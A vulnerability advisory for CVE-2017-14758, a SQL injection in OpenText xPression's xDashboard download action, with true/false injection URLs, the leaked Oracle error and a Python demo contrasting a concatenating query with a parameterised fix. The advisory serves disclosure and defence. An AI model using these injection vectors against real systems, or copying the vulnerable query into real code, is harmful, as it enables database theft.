OpenText Document Sciences xPression version 4.5SP1 Patch 13 suffers from a remote SQL injection vulnerability in the xDashboard functionality.
Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Because the application does not use prepared statements, the jobRunId
parameter of the xDashboard job-history download action is concatenated
directly into a SQL query, leaving the application vulnerable to SQL
injection. An attacker can retrieve data from the application database
by exploiting the issue.
Vector:
-------
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
Additionally:
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
returns HTTP 200 with the following error in the response body:
HTTP/1.1 200 OK
[...]
<b>Errors: </b>
See nested exception; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended
The response discloses the whole query and the injection point (a bare
numeric comparison on JOBRUN_ID, with no quoting to escape), so the
same behaviour can also be used for error-based data extraction.
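To make the pattern concrete, the following Python snippet is an added example and is not code from the advisory or from OpenText. It rebuilds the lookup seen in the leaked query against an in-memory SQLite table (constructed sample rows, column list trimmed; the real backend is Oracle, so the syntax-error text differs) and replays the three advisory inputs, with the URL-encoded `+` written as a space, first against a concatenating version and then against a validating, parameterised version. The function names and the sample data are assumptions; only the table and column names come from the advisory.

```python
import sqlite3

# Constructed stand-in for the T_JOBRUN table named in the leaked query.
# Only three of the real columns are modelled; the rows are made up.
SAMPLE_ROWS = [
    (1001, "monthly-statements", "OK"),
    (1002, "welcome-letters", "ERROR"),
]

# The three inputs from the advisory, with '+' decoded to a space and the
# 31-digit job run id replaced by a sample id that exists in SAMPLE_ROWS.
ADVISORY_INPUTS = {
    "true":   "1001 and 1=1",
    "false":  "1001 and 1=2",
    "syntax": "1001aaa",
}


def make_db():
    """Create the in-memory table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE T_JOBRUN (JOBRUN_ID INTEGER PRIMARY KEY, "
        "JOB_NAME TEXT, STATUS TEXT)"
    )
    conn.executemany("INSERT INTO T_JOBRUN VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def get_job_runs_by_ids_vulnerable(conn, job_run_id):
    """Assumed shape of the flawed lookup: the request parameter is pasted
    straight into the WHERE clause, exactly as the leaked query suggests."""
    sql = ("SELECT JOBRUN_ID, JOB_NAME, STATUS FROM T_JOBRUN "
           "WHERE JOBRUN_ID=" + job_run_id)
    return conn.execute(sql).fetchall()


def get_job_runs_by_ids_fixed(conn, job_run_id):
    """Hardened form: reject anything that is not a plain decimal integer,
    then bind the value as a query parameter instead of concatenating it."""
    if not job_run_id.isdigit():
        raise ValueError("jobRunId must be a positive integer")
    sql = ("SELECT JOBRUN_ID, JOB_NAME, STATUS FROM T_JOBRUN "
           "WHERE JOBRUN_ID=?")
    return conn.execute(sql, (int(job_run_id),)).fetchall()


def probe(lookup, conn):
    """Replay the advisory inputs through `lookup` and record, per input,
    either the number of rows returned or the name of the exception raised.
    With the vulnerable lookup the true/false pair differ (boolean oracle)
    and the malformed id raises a database syntax error; with the fixed
    lookup every injected input is rejected before reaching the database."""
    outcome = {}
    for label, payload in ADVISORY_INPUTS.items():
        try:
            outcome[label] = len(lookup(conn, payload))
        except (sqlite3.OperationalError, ValueError) as exc:
            outcome[label] = type(exc).__name__
    return outcome


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(get_job_runs_by_ids_vulnerable, db))
    print("fixed:     ", probe(get_job_runs_by_ids_fixed, db))
    print("legit id:  ", get_job_runs_by_ids_fixed(db, "1001"))
```

The row-count difference between the `true` and `false` inputs is what turns a download action into a boolean oracle, and the `OperationalError` is the SQLite counterpart of the ORA-00933 shown above; the parameterised version never lets either condition reach the database.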
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl